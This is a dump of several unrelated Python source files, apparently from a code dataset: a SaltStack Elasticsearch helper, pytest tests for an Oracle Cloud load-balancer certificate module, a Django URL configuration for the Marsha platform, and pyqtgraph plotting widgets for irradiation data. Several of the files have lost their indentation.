salt myminion elasticsearch.index_template_exists testindex_templ
'''
es = _get_instance(hosts, profile)
try:
if es.indices.exists_template(name=name):
return True
else:
return False
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_template_get(name, hosts=None, profile='elasticsearch'):
'''
Retrieve template definition of index or index/type
CLI example::
salt myminion elasticsearch.index_template_get testindex_templ user
'''
es = _get_instance(hosts, profile)
try:
ret = es.indices.get_template(name=name) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
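# Illustrative profile sketch (minion or master config; the key names mirror what
# _get_instance() looks up above, and the host names are placeholders):
#
#   elasticsearch:
#     host: 'elastic01:9200'
#
# or, for a multi-node cluster:
#
#   elasticsearch:
#     hosts:
#       - 'elastic01:9200'
#       - 'elastic02:9200'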
|
StarcoderdataPython
|
1860001
|
<gh_stars>100-1000
# Copyright (c) 2017, 2018, 2019, Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
import pytest
from nose.plugins.skip import SkipTest
import logging
from ansible.modules.cloud.oracle import oci_load_balancer_certificate
from ansible.module_utils.oracle import oci_lb_utils
import tempfile
import os
from ansible.module_utils import six
try:
import oci
from oci.util import to_dict
from oci.load_balancer.models import (
Certificate,
WorkRequest,
CreateCertificateDetails,
)
from oci.exceptions import ServiceError, ClientError
except ImportError:
raise SkipTest("test_oci_load_balancer_certificate.py requires `oci` module")
class FakeModule(object):
def __init__(self, **kwargs):
self.params = kwargs
def fail_json(self, *args, **kwargs):
self.exit_args = args
self.exit_kwargs = kwargs
raise Exception(kwargs["msg"])
def exit_json(self, *args, **kwargs):
self.exit_args = args
self.exit_kwargs = kwargs
@pytest.fixture()
def lb_client(mocker):
mock_lb_client = mocker.patch(
"oci.load_balancer.load_balancer_client.LoadBalancerClient"
)
return mock_lb_client.return_value
@pytest.fixture()
def get_certificate_patch(mocker):
return mocker.patch.object(oci_lb_utils, "get_certificate")
@pytest.fixture()
def is_same_certificate_patch(mocker):
return mocker.patch.object(oci_lb_utils, "is_same_certificate")
@pytest.fixture()
def create_or_update_lb_resources_and_wait_patch(mocker):
return mocker.patch.object(oci_lb_utils, "create_or_update_lb_resources_and_wait")
@pytest.fixture()
def delete_lb_resources_and_wait_patch(mocker):
return mocker.patch.object(oci_lb_utils, "delete_lb_resources_and_wait")
def setUpModule():
logging.basicConfig(
filename="/tmp/oci_ansible_module.log", filemode="a", level=logging.INFO
)
oci_load_balancer_certificate.set_logger(logging)
def test_create_certificate(
lb_client, get_certificate_patch, create_or_update_lb_resources_and_wait_patch
):
certificate_bundle = get_certificate_bundle()
module = get_module(certificate_bundle)
certificate = get_certificate(certificate_bundle)
get_certificate_patch.side_effect = [None, certificate]
create_or_update_lb_resources_and_wait_patch.return_value = dict(
certificate=to_dict(certificate), changed=True
)
result = oci_load_balancer_certificate.create_certificate(lb_client, module)
delete_cert_bundle(certificate_bundle)
assert result["changed"] is True
def test_create_certificate_certificate_exists_with_different_attribute_values(
lb_client, get_certificate_patch, is_same_certificate_patch
):
module = get_module(dict())
error_message = (
"Certificate "
+ module.params.get("name")
+ " with different attribute value already available in load balancer "
+ module.params.get("load_balancer_id")
)
certificate = get_certificate(dict())
get_certificate_patch.return_value = certificate
is_same_certificate_patch.return_value = False
try:
oci_load_balancer_certificate.create_certificate(lb_client, module)
except Exception as ex:
assert error_message in ex.args[0]
def test_create_certificate_certificate_exists_with_same_attribute_values(
lb_client, get_certificate_patch, is_same_certificate_patch
):
module = get_module(dict())
certificate = get_certificate(dict())
get_certificate_patch.return_value = certificate
is_same_certificate_patch.return_value = True
result = oci_load_balancer_certificate.create_certificate(lb_client, module)
assert result["changed"] is False
def test_create_certificate_service_error(lb_client, get_certificate_patch):
error_message = "Internal Server Error"
module = get_module(dict())
get_certificate_patch.return_value = None
lb_client.create_certificate.side_effect = ServiceError(
499, "InternalServerError", dict(), error_message
)
try:
oci_load_balancer_certificate.create_certificate(lb_client, module)
except Exception as ex:
assert error_message in ex.args[0]
def test_create_certificate_client_error(
    lb_client, get_certificate_patch, create_or_update_lb_resources_and_wait_patch
):
error_message = "Work Request Failed"
module = get_module(dict())
get_certificate_patch.return_value = None
create_or_update_lb_resources_and_wait_patch.side_effect = ClientError(
Exception("Work Request Failed")
)
try:
oci_load_balancer_certificate.create_certificate(lb_client, module)
except Exception as ex:
assert error_message in ex.args[0]
"""
def test_get_existing_certificate(lb_client):
certificate_bundle = get_certificate_bundle()
module = get_module(certificate_bundle)
certificate = get_certificate(certificate_bundle)
lb_client.list_certificates.return_value = get_response(
200, None, [certificate], None)
result = oci_load_balancer_certificate.get_existing_certificate(
lb_client, module, 'ocid1.loadbalancer.aaaa', module.params.get('name'))
delete_cert_bundle(certificate_bundle)
assert result.certificate_name is module.params.get('name')
def test_get_existing_certificate_not_found(lb_client):
certificate_bundle = get_certificate_bundle()
module = get_module(certificate_bundle)
certificate = get_certificate(certificate_bundle)
lb_client.list_certificates.return_value = get_response(
200, None, [certificate], None)
result = oci_load_balancer_certificate.get_existing_certificate(
lb_client, module, 'ocid1.loadbalancer.aaaa', 'other_name')
delete_cert_bundle(certificate_bundle)
assert result is None
def test_get_existing_certificate_service_error(lb_client):
error_message = "Internal Server Error"
certificate_bundle = get_certificate_bundle()
module = get_module(certificate_bundle)
certificate = get_certificate(certificate_bundle)
lb_client.list_certificates.side_effect = ServiceError(
499, 'InternalServerError', dict(), error_message)
delete_cert_bundle(certificate_bundle)
try:
result = oci_load_balancer_certificate.get_existing_certificate(
lb_client, module, 'ocid1.loadbalancer.aaaa', 'other_name')
except Exception as ex:
assert error_message in ex.args[0]
def test_is_same_certificate_true():
certificate_bundle = get_certificate_bundle()
certificate = get_certificate(certificate_bundle)
create_certificate_details = CreateCertificateDetails()
create_certificate_details.ca_certificate = certificate.ca_certificate
create_certificate_details.certificate_name = certificate.certificate_name
create_certificate_details.public_certificate = certificate.public_certificate
result = oci_load_balancer_certificate.is_same_certificate(create_certificate_details, certificate)
delete_cert_bundle(certificate_bundle)
assert result is True
def test_is_same_certificate_false():
certificate_bundle = get_certificate_bundle()
certificate = get_certificate(certificate_bundle)
create_certificate_details = CreateCertificateDetails()
create_certificate_details.ca_certificate = certificate.ca_certificate
create_certificate_details.certificate_name = 'other_name'
create_certificate_details.public_certificate = certificate.public_certificate
result = oci_load_balancer_certificate.is_same_certificate(create_certificate_details, certificate)
delete_cert_bundle(certificate_bundle)
assert result is False
"""
def test_delete_certificate(lb_client, delete_lb_resources_and_wait_patch):
module = get_module(dict())
certificate = get_certificate(dict())
delete_lb_resources_and_wait_patch.return_value = dict(
certificate=to_dict(certificate), changed=True
)
result = oci_load_balancer_certificate.delete_certificate(lb_client, module)
assert result["changed"] is True
def get_certificate(cert_bundle):
certificate = Certificate()
certificate.ca_certificate = cert_bundle.get("ca_certificate")
certificate.public_certificate = cert_bundle.get("public_certificate")
certificate.certificate_name = "test_certificate"
return certificate
def get_certificate_bundle():
cert_attributes = ["ca_certificate", "private_key", "public_certificate"]
cert_bundle = dict()
for cert_attribute in cert_attributes:
new_file, filename = tempfile.mkstemp()
os.write(new_file, b"Certificate content")
cert_bundle.update({cert_attribute: filename})
return cert_bundle
def delete_cert_bundle(certificate_bundle):
cert_attributes = ["ca_certificate", "private_key", "public_certificate"]
for dummy, value in six.iteritems(certificate_bundle):
os.remove(value)
def get_response(status, header, data, request):
return oci.Response(status, header, data, request)
def get_module(additional_properties):
params = {
"load_balancer_id": "ocid1.loadbalancer.oc1.iad.aaaaa",
"name": "test_certificate",
"passphrase": "<PASSWORD>",
}
params.update(additional_properties)
module = FakeModule(**params)
return module
|
StarcoderdataPython
|
6463649
|
"""Marsha URLs configuration."""
from django.conf import settings
from django.urls import include, path, re_path
from rest_framework.renderers import CoreJSONRenderer
from rest_framework.routers import DefaultRouter
from rest_framework.schemas import get_schema_view
from marsha.core import models
from marsha.core.admin import admin_site
from marsha.core.api import (
DocumentViewSet,
LiveRegistrationViewSet,
OrganizationViewSet,
PlaylistViewSet,
SharedLiveMediaViewSet,
ThumbnailViewSet,
TimedTextTrackViewSet,
UserViewSet,
VideoViewSet,
XAPIStatementView,
pairing_challenge,
update_state,
)
from marsha.core.views import (
DocumentView,
LTIRespondView,
LTISelectView,
SiteView,
VideoView,
)
from marsha.development.api import local_document_upload, local_video_upload
router = DefaultRouter()
router.register(models.Video.RESOURCE_NAME, VideoViewSet, basename="videos")
router.register(models.Document.RESOURCE_NAME, DocumentViewSet, basename="documents")
router.register(
models.LiveRegistration.RESOURCE_NAME,
LiveRegistrationViewSet,
basename="live_registrations",
)
router.register(
models.TimedTextTrack.RESOURCE_NAME,
TimedTextTrackViewSet,
basename="timed_text_tracks",
)
router.register(models.Thumbnail.RESOURCE_NAME, ThumbnailViewSet, basename="thumbnails")
router.register("organizations", OrganizationViewSet, basename="organizations")
router.register("playlists", PlaylistViewSet, basename="playlists")
router.register("users", UserViewSet, basename="users")
router.register(
models.SharedLiveMedia.RESOURCE_NAME,
SharedLiveMediaViewSet,
basename="sharedlivemedias",
)
urlpatterns = [
# Admin
path(f"{admin_site.name}/", admin_site.urls),
# LTI
path("lti/select/", LTISelectView.as_view(), name="select_lti_view"),
path("lti/respond/", LTIRespondView.as_view(), name="respond_lti_view"),
path("lti/videos/<uuid:uuid>", VideoView.as_view(), name="video_lti_view"),
path("lti/documents/<uuid:uuid>", DocumentView.as_view(), name="document_lti_view"),
# Public resources
path("videos/<uuid:uuid>", VideoView.as_view(), name="video_public"),
path("documents/<uuid:uuid>", DocumentView.as_view(), name="document_public"),
# API
path("api/pairing-challenge", pairing_challenge, name="pairing_challenge"),
path("api/update-state", update_state, name="update_state"),
path(
"api/schema",
get_schema_view(title="Marsha API", renderer_classes=[CoreJSONRenderer]),
name="schema",
),
path("api/", include(router.urls)),
re_path(
r"^xapi/(?P<resource>video|document)/$",
XAPIStatementView.as_view(),
name="xapi",
),
]
if settings.BBB_ENABLED:
urlpatterns += [path("", include("marsha.bbb.urls"))]
if settings.DEBUG:
urlpatterns += [path("", include("marsha.development.urls"))]
if "dummy" in settings.STORAGE_BACKEND:
urlpatterns += [
path(
"api/video-upload/<uuid:uuid>",
local_video_upload,
name="local-video-upload",
),
path(
"api/document-upload/<uuid:uuid>",
local_document_upload,
name="local-document-upload",
),
]
urlpatterns += [
re_path(".*", SiteView.as_view(), name="site"),
]
|
StarcoderdataPython
|
1643202
|
<gh_stars>0
import logging
import pyqtgraph as pg
import numpy as np
from matplotlib import cm as mcmaps, colors as mcolors
from PyQt5 import QtWidgets, QtCore, QtGui
from collections import OrderedDict
from irrad_control.gui.widgets.util_widgets import GridContainer
# Matplotlib default colors
_MPL_COLORS = [tuple(round(255 * v) for v in rgb) for rgb in [mcolors.to_rgb(def_col) for def_col in mcolors.TABLEAU_COLORS]]
_BOLD_FONT = QtGui.QFont()
_BOLD_FONT.setBold(True)
class PlotWindow(QtWidgets.QMainWindow):
"""Window which only shows a PlotWidget as its central widget."""
# PyQt signal which is emitted when the window closes
closeWin = QtCore.pyqtSignal()
def __init__(self, plot, parent=None):
super(PlotWindow, self).__init__(parent)
# PlotWidget to display in window
self.pw = plot
# Window appearance settings
self.setWindowTitle(type(plot).__name__)
self.screen = QtWidgets.QDesktopWidget().screenGeometry()
        self.setMinimumSize(int(0.25 * self.screen.width()), int(0.25 * self.screen.height()))
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
# Set plot as central widget
self.setCentralWidget(self.pw)
def closeEvent(self, _):
self.closeWin.emit()
self.close()
class PlotWrapperWidget(QtWidgets.QWidget):
"""Widget that wraps PlotWidgets and implements some additional features which allow to control the PlotWidgets content.
Also adds button to show the respective PlotWidget in a QMainWindow"""
def __init__(self, plot=None, parent=None):
super(PlotWrapperWidget, self).__init__(parent=parent)
# Set a reasonable minimum size
self.setMinimumSize(300, 300)
# PlotWidget to display; set size policy
        self.pw = plot
        if self.pw is not None:
            self.pw.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
self.external_win = None
# Main layout and sub layout for e.g. checkboxes which allow to show/hide curves in PlotWidget etc.
self.setLayout(QtWidgets.QVBoxLayout())
self.plot_options = GridContainer(name='Plot options' if not hasattr(self.pw, 'name') else '{} options'.format(self.pw.name))
# Setup widget if class instance was initialized with plot
if self.pw is not None:
self._setup_widget()
def _setup_widget(self):
"""Setup of the additional widgets to control the appearance and content of the PlotWidget"""
_sub_layout_1 = QtWidgets.QHBoxLayout()
_sub_layout_1.setSpacing(self.plot_options.grid.verticalSpacing())
_sub_layout_2 = QtWidgets.QHBoxLayout()
_sub_layout_2.setSpacing(self.plot_options.grid.verticalSpacing())
# Create checkboxes in order to show/hide curves in plots
if hasattr(self.pw, 'show_data') and hasattr(self.pw, 'curves'):
_sub_layout_2.addWidget(QtWidgets.QLabel('Toggle curve{}:'.format('s' if len(self.pw.curves) > 1 else '')))
all_checkbox = QtWidgets.QCheckBox('All')
all_checkbox.setFont(_BOLD_FONT)
all_checkbox.setChecked(True)
_sub_layout_2.addWidget(all_checkbox)
for curve in self.pw.curves:
checkbox = QtWidgets.QCheckBox(curve)
checkbox.setChecked(True)
all_checkbox.stateChanged.connect(lambda _, cbx=checkbox: cbx.setChecked(all_checkbox.isChecked()))
checkbox.stateChanged.connect(lambda v, n=checkbox.text(): self.pw.show_data(n, bool(v)))
_sub_layout_2.addWidget(checkbox)
_sub_layout_1.addWidget(QtWidgets.QLabel('Features:'))
_sub_layout_1.addStretch()
# Add possibility to en/disable showing curve statistics
if hasattr(self.pw, 'enable_stats'):
stats_checkbox = QtWidgets.QCheckBox('Enable statistics')
stats_checkbox.setChecked(self.pw._show_stats)
stats_checkbox.stateChanged.connect(lambda state: self.pw.enable_stats(bool(state)))
stats_checkbox.setToolTip("Show curve statistics while hovering / clicking curve(s)")
_sub_layout_1.addWidget(stats_checkbox)
# Whenever x axis is time add spinbox to change time period for which data is shown
if hasattr(self.pw, 'update_period'):
# Add horizontal helper line if we're looking at scrolling data plot
unit = self.pw.plt.getAxis('left').labelUnits or '[?]'
label = self.pw.plt.getAxis('left').labelText or 'Value'
self.helper_line = pg.InfiniteLine(angle=0, label=label + ': {value:.2E} ' + unit)
self.helper_line.setMovable(True)
self.helper_line.setPen(color='w', style=pg.QtCore.Qt.DashLine, width=2)
if hasattr(self.pw, 'unitChanged'):
self.pw.unitChanged.connect(lambda u: setattr(self.helper_line.label, 'format', self.pw.plt.getAxis('left').labelText + ': {value:.2E} ' + u))
self.pw.unitChanged.connect(self.helper_line.label.valueChanged)
hl_checkbox = QtWidgets.QCheckBox('Show helper line')
hl_checkbox.stateChanged.connect(
lambda v: self.pw.plt.addItem(self.helper_line) if v else self.pw.plt.removeItem(self.helper_line))
_sub_layout_1.addWidget(hl_checkbox)
# Spinbox for period to be shown on x axis
spinbox_period = QtWidgets.QSpinBox()
spinbox_period.setRange(1, 3600)
spinbox_period.setValue(self.pw._period)
spinbox_period.setPrefix('Time period: ')
spinbox_period.setSuffix(' s')
spinbox_period.valueChanged.connect(lambda v: self.pw.update_period(v))
_sub_layout_1.addWidget(spinbox_period)
if hasattr(self.pw, 'update_refresh_rate'):
# Spinbox for plot refresh rate
spinbox_refresh = QtWidgets.QSpinBox()
spinbox_refresh.setRange(0, 60)
spinbox_refresh.setValue(int(1000 / self.pw.refresh_timer.interval()))
spinbox_refresh.setPrefix('Refresh rate: ')
spinbox_refresh.setSuffix(' Hz')
spinbox_refresh.valueChanged.connect(lambda v: self.pw.update_refresh_rate(v))
_sub_layout_1.addWidget(spinbox_refresh)
# Button to move self.pw to PlotWindow instance
self.btn_open = QtWidgets.QPushButton()
self.btn_open.setIcon(self.btn_open.style().standardIcon(QtWidgets.QStyle.SP_TitleBarMaxButton))
self.btn_open.setToolTip('Open plot in window')
self.btn_open.setFixedSize(25, 25)
self.btn_open.clicked.connect(self.move_to_win)
self.btn_open.clicked.connect(lambda: self.layout().insertStretch(1))
self.btn_open.clicked.connect(lambda: self.btn_open.setEnabled(False))
self.btn_open.clicked.connect(lambda: self.btn_close.setEnabled(True))
# Button to close self.pw to PlotWindow instance
self.btn_close = QtWidgets.QPushButton()
self.btn_close.setIcon(self.btn_open.style().standardIcon(QtWidgets.QStyle.SP_TitleBarCloseButton))
self.btn_close.setToolTip('Close plot in window')
self.btn_close.setFixedSize(25, 25)
self.btn_close.setEnabled(False)
self.btn_close.clicked.connect(lambda: self.btn_close.setEnabled(False))
self.btn_close.clicked.connect(lambda: self.external_win.close())
_sub_layout_1.addWidget(self.btn_open)
_sub_layout_1.addWidget(self.btn_close)
self.plot_options.add_layout(_sub_layout_1)
self.plot_options.add_layout(_sub_layout_2)
# Insert everything into main layout
self.layout().insertWidget(0, self.plot_options)
self.layout().insertWidget(1, self.pw)
def set_plot(self, plot):
"""Set PlotWidget and set up widgets"""
self.pw = plot
self._setup_widget()
def move_to_win(self):
"""Move PlotWidget to PlotWindow. When window is closed, transfer widget back to self"""
self.external_win = PlotWindow(plot=self.pw, parent=self)
self.external_win.closeWin.connect(lambda: self.layout().takeAt(1))
self.external_win.closeWin.connect(lambda: self.layout().insertWidget(1, self.pw))
self.external_win.closeWin.connect(lambda: self.btn_open.setEnabled(True))
self.external_win.show()
class MultiPlotWidget(QtWidgets.QScrollArea):
"""Widget to display multiple plot in a matrix"""
def __init__(self, plots=None, parent=None):
super(MultiPlotWidget, self).__init__(parent)
# Some basic settings
self.setFrameShape(QtWidgets.QFrame.NoFrame)
self.setWidgetResizable(True)
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
# Main widget is a vertical splitter
self.main_splitter = QtWidgets.QSplitter()
self.main_splitter.setOrientation(QtCore.Qt.Vertical)
self.main_splitter.setChildrenCollapsible(False)
# Colors
p, r = self.palette(), self.backgroundRole()
p.setColor(r, self.main_splitter.palette().color(QtGui.QPalette.AlternateBase))
self.setPalette(p)
self.setAutoFillBackground(True)
# Set main widget
self.setWidget(self.main_splitter)
# Add initial plots
if plots is not None:
if any(isinstance(x, (list, tuple)) for x in plots):
self.add_plot_matrix(plots)
else:
self.add_plots(plots)
def add_plots(self, plots):
# If we only add one plot; just add to layout
if isinstance(plots, QtWidgets.QWidget):
self.main_splitter.addWidget(plots)
# *plots* is an iterable of plots
elif isinstance(plots, (list, tuple)):
# Create a horizontal splitter
splitter = QtWidgets.QSplitter()
splitter.setOrientation(QtCore.Qt.Horizontal)
splitter.setChildrenCollapsible(False)
# Loop over individual plots and add them
for sub_plot in plots:
splitter.addWidget(sub_plot)
self.main_splitter.addWidget(splitter) # Add to main layout
            splitter.setSizes([self.width() // len(plots)] * len(plots))  # Same width
else:
raise TypeError("*plot* must be individual or iterable of plot widgets")
def add_plot_matrix(self, plot_matrix):
if not isinstance(plot_matrix, (list, tuple)):
raise ValueError("*plot* needs to be 2-dimensional iterable containing plots / QWidgets")
for sub_plots in plot_matrix:
self.add_plots(sub_plots)
def wheelEvent(self, ev):
"""Override mousewheel; plots use mouse wheel event for zoom"""
if ev.type() == QtCore.QEvent.Wheel:
ev.ignore()
class IrradPlotWidget(pg.PlotWidget):
"""Base class for plot widgets"""
def __init__(self, refresh_rate=20, parent=None):
super(IrradPlotWidget, self).__init__(parent)
# Actual plotitem
self.plt = self.getPlotItem()
# Store curves to be displayed and active curves under cursor
self.curves = OrderedDict()
self.active_curves = OrderedDict() # Store channel which is currently active (e.g. statistics are shown)
# Hold data
self._data = OrderedDict()
self._data_is_set = False
# Timer for refreshing plots with a given time interval to avoid unnecessary updating / high load
self.refresh_timer = QtCore.QTimer()
# Connect timeout signal of refresh timer to refresh_plot method
self.refresh_timer.timeout.connect(self.refresh_plot)
# Start timer
self.refresh_timer.start(int(1000 / refresh_rate))
# Hold buttons which are inside the plot
self._in_plot_btns = []
# TextItem for showing statistic of curves; set invisible first, only show on user request
self.stats_text = pg.TextItem(text='No statistics to show', border=pg.mkPen(color='w', style=pg.QtCore.Qt.SolidLine))
self._static_stats_text = False
self._show_stats = False # Show statistics of curves
self.stats_text.setVisible(False)
def enable_stats(self, enable=True):
def _manage_signals(sig, slot, connect):
try:
sig.connect(slot) if connect else sig.disconnect(slot)
except Exception:
logging.error('Signal {} not {} slot {}'.format(repr(sig), '{}connected {}'.format(*('', 'to') if connect else ('dis', 'from')), repr(slot)))
# Set flag
self._show_stats = enable
# Signals
_manage_signals(sig=self.plt.scene().sigMouseMoved, slot=self._set_active_curves, connect=enable)
_manage_signals(sig=self.plt.scene().sigMouseClicked, slot=self._set_active_curves, connect=enable)
_manage_signals(sig=self.plt.scene().sigMouseClicked, slot=self._toggle_static_stat_text, connect=enable)
# Add/remove stats text from plt
self.stats_text.setParentItem(self.plt if enable else None)
if not enable:
self.stats_text.setVisible(enable)
def _toggle_static_stat_text(self, click):
self._static_stats_text = not self._static_stats_text if any(self.active_curves.values()) else False
self._set_active_curves(click)
def _set_active_curves(self, event):
"""Method updating which curves are active; active curves statistics are shown on plot"""
if self._static_stats_text:
return
# Check whether it was a click or move
click = hasattr(event, 'button')
event_pos = event if not click else event.scenePos()
# Get mouse coordinates in the coordinate system of the plot
pos = self.plt.vb.mapSceneToView(event_pos)
# Update current active curves
for curve in self.curves:
if isinstance(self.curves[curve], pg.PlotCurveItem):
self.active_curves[curve] = self.curves[curve].mouseShape().contains(pos) or self.curves[curve].getPath().contains(pos)
elif isinstance(self.curves[curve], CrosshairItem):
self.active_curves[curve] = True if self.curves[curve].intersect.pointsAt(pos) else False
elif isinstance(self.curves[curve], pg.ImageItem):
self.active_curves[curve] = self.plt.scene().sceneRect().contains(pos) and self.curves[curve] in self.plt.items
else:
self.active_curves[curve] = False
# We have active curves
if any(self.active_curves.values()):
self.stats_text.setPos(event_pos)
self.stats_text.setVisible(True)
else:
self.stats_text.setVisible(False)
def _setup_plot(self):
raise NotImplementedError('Please implement a _setup_plot method')
def set_data(self):
raise NotImplementedError('Please implement a set_data method')
def refresh_plot(self):
raise NotImplementedError('Please implement a refresh_plot method')
def update_refresh_rate(self, refresh_rate):
"""Update rate with which the plot is drawn"""
if refresh_rate == 0:
logging.warning("{} display stopped. Data is not being buffered while not being displayed.".format(type(self).__name__))
self.refresh_timer.stop() # Stops QTimer
else:
self.refresh_timer.start(int(1000 / refresh_rate)) # Restarts QTimer with new updated interval
def add_plot_button(self, btn):
"""Adds an in-plot button to the plotitem"""
if btn not in self._in_plot_btns:
self._in_plot_btns.append(btn)
self._update_button_pos()
def _update_button_pos(self, btn_spacing=20, x_offset=70, y_offset=5):
btn_pos_x = x_offset
btn_pos_y = y_offset
is_visible = [b.isVisible() for b in self._in_plot_btns]
for i, _btn in enumerate(self._in_plot_btns):
# The first button will always be set to upper left corner
# Check if the previous button was visible; if not, place at current position
if i != 0 and is_visible[i - 1]:
btn_pos_x += self._in_plot_btns[i - 1].boundingRect().width() + btn_spacing
# Place button
_btn.setPos(btn_pos_x, btn_pos_y)
def show_data(self, curve=None, show=True):
"""Show/hide the data of curve in PlotItem. If *curve* is None, all curves are shown/hidden."""
if curve is not None and curve not in self.curves:
logging.error('{} data not in graph. Current graphs: {}'.format(curve, ','.join(self.curves.keys())))
return
_curves = [curve] if curve is not None else self.curves.keys()
for _cu in _curves:
if isinstance(self.curves[_cu], CrosshairItem):
self.curves[_cu].add_to_plot() if show else self.curves[_cu].remove_from_plot()
self.curves[_cu].add_to_legend() if show else self.curves[_cu].remove_from_legend()
else:
if not any(isinstance(self.curves[_cu], x) for x in (pg.InfiniteLine, pg.ImageItem)):
self.legend.addItem(self.curves[_cu], _cu) if show else self.legend.removeItem(_cu)
self.plt.addItem(self.curves[_cu]) if show else self.plt.removeItem(self.curves[_cu])
class ScrollingIrradDataPlot(IrradPlotWidget):
"""PlotWidget which displays a set of irradiation data curves over time"""
def __init__(self, channels, units=None, period=60, refresh_rate=20, colors=_MPL_COLORS, name=None, parent=None):
super(ScrollingIrradDataPlot, self).__init__(refresh_rate=refresh_rate, parent=parent)
self.channels = channels
self.units = units
self.name = name
# Attributes for data visualization
self._time = None # array for timestamps
self._start = 0 # starting timestamp of each cycle
self._timestamp = 0 # timestamp of each incoming data
self._offset = 0 # offset for increasing cycle time
self._idx = 0 # cycling index through time axis
self._period = period # amount of time for which to display data; default, displaying last 60 seconds of data
self._filled = False # bool to see whether the array has been filled
self._drate = None # data rate
self._colors = colors # Colors to plot curves in
# Setup the main plot
self._setup_plot()
def _setup_plot(self):
"""Setting up the plot. The Actual plot (self.plt) is the underlying PlotItem of the respective PlotWidget"""
# Get plot item and setup
self.plt.setDownsampling(auto=True)
self.plt.setLabel('left', text='Signal', units='V' if self.units is None else self.units['left'])
# Title
self.plt.setTitle('' if self.name is None else self.name)
# Additional axis if specified
        if self.units is not None and 'right' in self.units:
self.plt.setLabel('right', text='Signal', units=self.units['right'])
# X-axis is time
self.plt.setLabel('bottom', text='Time', units='s')
self.plt.showGrid(x=True, y=True, alpha=0.66)
self.plt.setLimits(xMax=0)
self.enable_stats()
# Make legend entries for curves
self.legend = pg.LegendItem(offset=(80, -50))
self.legend.setParentItem(self.plt)
# Make OrderedDict of curves and dict to hold active value indicating whether the user interacts with the curve
for i, ch in enumerate(self.channels):
self.curves[ch] = pg.PlotCurveItem(pen=self._colors[i % len(self._colors)])
self.curves[ch].opts['mouseWidth'] = 20 # Needed for indication of active curves
self.show_data(ch) # Show data and legend
def _set_stats(self):
"""Show curve statistics for active_curves which have been clicked or are hovered over"""
current_actives = [curve for curve in self.active_curves if self.active_curves[curve]]
if not current_actives:
return
n_actives = len(current_actives)
# Update text for statistics widget
current_stat_text = 'Curve stats of {} curve{}:\n'.format(n_actives, '' if n_actives == 1 else 's')
# Loop over active curves and create current stats
for curve in current_actives:
# If data is not yet filled; mask all NaN values and invert bool mask
mask = None if self._filled else ~np.isnan(self._data[curve])
# Get stats
if mask is None:
mean, std, entries = self._data[curve].mean(), self._data[curve].std(), self._data[curve].shape[0]
else:
mean, std, entries = self._data[curve][mask].mean(), self._data[curve][mask].std(), self._data[curve][mask].shape[0]
current_stat_text += ' '
current_stat_text += curve + u': ({:.2E} \u00B1 {:.2E}) {} (#{})'.format(mean, std, self.plt.getAxis('left').labelUnits, entries)
current_stat_text += '\n' if curve != current_actives[-1] else ''
# Set color and text
current_stat_color = (100, 100, 100) if n_actives != 1 else self.curves[current_actives[0]].opts['pen'].color()
self.stats_text.fill = pg.mkBrush(color=current_stat_color, style=pg.QtCore.Qt.SolidPattern)
self.stats_text.setText(current_stat_text)
def set_data(self, data):
"""Set the data of the plot. Input data is data plus meta data"""
# Meta data and data
_meta, _data = data['meta'], data['data']
# Store timestamp of current data
self._timestamp = _meta['timestamp']
# Set data rate if available
if 'data_rate' in _meta:
self._drate = _meta['data_rate']
# Get data rate from data in order to set time axis
if self._time is None:
if 'data_rate' in _meta:
self._drate = _meta['data_rate']
shape = int(round(self._drate) * self._period + 1)
self._time = np.full(shape=shape, fill_value=np.nan)
for ch in self.channels:
self._data[ch] = np.full(shape=shape, fill_value=np.nan)
self._data_is_set = True
# Fill data
else:
# If we made one cycle, start again from the beginning
if self._idx == self._time.shape[0]:
self._idx = 0
self._filled = True
# If we start a new cycle, set new start timestamp and offset
if self._idx == 0:
self._start = self._timestamp
self._offset = 0
# Set time axis
self._time[self._idx] = self._start - self._timestamp + self._offset
# Increment index
self._idx += 1
# Set data in curves
for ch in _data:
# Shift data to the right and set 0th element
self._data[ch][1:] = self._data[ch][:-1]
self._data[ch][0] = _data[ch]
def refresh_plot(self):
"""Refresh the plot. This method is supposed to be connected to the timeout-Signal of a QTimer"""
if self._data_is_set:
for curve in self.curves:
# Update data of curves
if not self._filled:
mask = ~np.isnan(self._data[curve]) # Mask all NaN values and invert bool mask
self.curves[curve].setData(self._time[mask], self._data[curve][mask])
else:
self.curves[curve].setData(self._time, self._data[curve])
# Only calculate statistics if we look at them
if self._show_stats:
self._set_stats()
def update_axis_scale(self, scale, axis='left'):
"""Update the scale of current axis"""
self.plt.getAxis(axis).setScale(scale=scale)
def update_period(self, period):
"""Update the period of time for which the data is displayed in seconds"""
# Update attribute
self._period = period
# Create new data and time
shape = int(round(self._drate) * self._period + 1)
new_data = OrderedDict([(ch, np.full(shape=shape, fill_value=np.nan)) for ch in self.channels])
new_time = np.full(shape=shape, fill_value=np.nan)
# Check whether new time and data hold more or less indices
decreased = self._time.shape[0] >= shape
if decreased:
# Cut time axis
new_time = self._time[:shape]
# If filled before, go to 0, else go to 0 if current index is bigger than new shape
if self._filled:
self._idx = 0
else:
self._idx = 0 if self._idx >= shape else self._idx
# Set wheter the array is now filled
self._filled = True if self._idx == 0 else False
else:
# Extend time axis
new_time[:self._time.shape[0]] = self._time
# If array was filled before, go to last time, set it as offset and start from last timestamp
if self._filled:
self._idx = self._time.shape[0]
self._start = self._timestamp
self._offset = self._time[-1]
self._filled = False
# Set new time and data
for ch in self.channels:
if decreased:
new_data[ch] = self._data[ch][:shape]
else:
new_data[ch][:self._data[ch].shape[0]] = self._data[ch]
# Update
self._time = new_time
self._data = new_data
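# Illustrative sketch of the payload expected by ScrollingIrradDataPlot.set_data
# (field names taken from the code above; channel names and values are made up):
#   plot.set_data({
#       'meta': {'timestamp': 1611152000.0, 'data_rate': 20.0},
#       'data': {'ch0': 0.12, 'ch1': 0.34},   # one reading per configured channel
#   })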
class RawDataPlot(ScrollingIrradDataPlot):
"""Plot for displaying the raw data of all channels of the respective ADC over time.
